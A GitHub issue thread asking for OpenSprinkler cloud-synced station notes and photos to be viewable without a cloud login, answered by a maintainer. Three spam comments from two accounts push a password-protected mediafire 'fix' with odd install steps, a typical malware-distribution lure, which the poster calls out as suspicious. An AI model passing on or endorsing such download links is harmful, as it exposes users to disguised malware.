### ISSUE TITLE
RFE: Add ability to view cloud sync data without logging in with every browser/mobile device?

### ISSUE THREAD

**Issue by BioSehnsucht** [OpenSprinkler/OpenSprinkler-Firmware#314]
Specifically, images and station notes.

I am about to have my irrigation system repaired by professionals, and while I can easily hand them a couple of QR codes to get them onto my guest wifi and a link to the OpenSprinkler IP, with the password printed below the QR code for the URL, so they can turn zones on and off easily while working on it, I don't want to also give them my cloud login just so they can see images / station notes, even though that would be handy for them to easily have access to. 

I only discovered today that the notes when entered on my phone, while appearing to stay cached somehow in the mobile browser, do not appear when accessed from my desktop, and vice versa, unless I am logged into the cloud account. I only figured out I needed cloud sync by coming to github to look for any issues related to the station notes, and finding an old issue where it was explained that the function needed cloud sync login to work.

Obviously this can't be solved before the contractors show up this week, but as a future usability improvement, it would be nice if anyone who logged into the device was able to see the the cloud content associated with the device, without needing to login to the cloud also?

1) Perhaps whenever logging in from the menu entry in the OpenSprinkler UI, some kind of API token is generated and stored on the OS device, and that is used for read-only cloud access to these specific features? Or even read-write? (Making this more a case of linking the device to your account, rather than simply being logged into your account while using your device)

2) It would also be nice if it was clear in the UI that you can't really store station notes for example without being logged in (it will happily let you do it and apparently somehow cache it at the browser level, but not actually load for any other browser etc).

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by BioSehnsucht** [comment]
Wow, someone needs to ensure their bots aren't double posting from multiple compromised accounts when they're trying to use Github issues to propagate clearly sus links. I peeked at that URL safely, 100MB patch file for a tiny project like this? LOL pass

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rayshobby** [comment]
Hi, the OpenSprinkler user manual:
https://openthings.freshdesk.com/support/solutions/articles/5000716364-opensprinkler-user-manuals
page 9 in the middle, specifically mentions that station notes and photos are 'cloud sync attributes' and as such only available when logged in.

You don't have to use your own OpenSprinkler account to log in. You can create an account just for the purpose of storing station notes and photos, and give that to your contractors.

Also, in the future please post this kind of request/issue to the OpenSprinkler-App repository.
https://github.com/OpenSprinkler/OpenSprinkler-App
This is not a firmware issue and it cannot be solved by updating the firmware since the controller itself does not have enough storage to store photos and notes.
